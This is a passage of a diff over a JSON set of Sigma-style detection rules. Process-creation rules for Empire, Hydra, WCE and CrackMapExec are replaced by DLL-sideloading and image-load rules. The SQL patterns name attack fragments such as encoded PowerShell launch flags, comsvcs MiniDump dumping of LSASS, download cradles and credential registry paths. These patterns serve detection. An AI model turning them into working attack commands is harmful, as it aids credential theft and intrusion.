looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other 
legitimate processes loading those DLLs in your environment." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects execution of perl using the 
\"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.persistence", + 
"attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron 
Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "status": "test", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": 
"ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. 
Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.t1059.001", + "attack.execution" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Many legitimate applications leverage this DLL. 
(Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - 
"attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "status": "test", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.002" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "title": "Fax Service DLL Search Order Hijack", + "id": 